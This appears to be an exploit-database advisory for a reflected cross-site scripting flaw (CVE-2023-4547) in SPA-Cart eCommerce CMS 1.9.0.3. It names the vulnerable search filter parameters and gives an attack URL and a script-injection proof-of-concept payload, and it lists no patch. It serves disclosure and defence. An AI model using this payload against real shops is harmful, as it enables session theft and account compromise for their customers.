header-logo
Suggest Exploit
vendor:
SPA-Cart eCommerce CMS
by:
CraCkEr
6.1
CVSS
MEDIUM
Reflected XSS
79, 74, 707
CWE
Product Name: SPA-Cart eCommerce CMS
Affected Version From: 1.9.0.3
Affected Version To: 1.9.0.3
Patch Exists: NO
Related CWE: CVE-2023-4547
CPE: a:spa-cart_ecommerce_cms:1.9.0.3
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro
2023

SPA-Cart eCommerce CMS 1.9.0.3 – Reflected XSS

The attacker can send to victim a link containing a malicious URL in an email or instant message, which can perform a wide variety of actions, such as stealing the victim's session token or login credentials

Mitigation:

Implement input validation and output encoding to prevent XSS attacks
Source

Exploit-DB raw data:

# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 20/08/2023
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Version: 1.9.0.3
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4547
# CWE: CWE-79 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials


Path: /search

GET parameter 'filter[brandid]' is vulnerable to XSS
GET parameter 'filter[price]' is vulnerable to XSS

https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB


XSS Payloads:

vnxjb"><script>alert(1)</script>bvu51


[-] Done